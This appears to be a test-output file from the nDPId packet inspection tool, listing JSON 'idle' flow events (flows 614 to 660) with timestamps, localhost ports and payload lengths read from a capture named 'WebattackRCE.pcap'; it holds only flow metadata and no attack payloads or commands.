-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 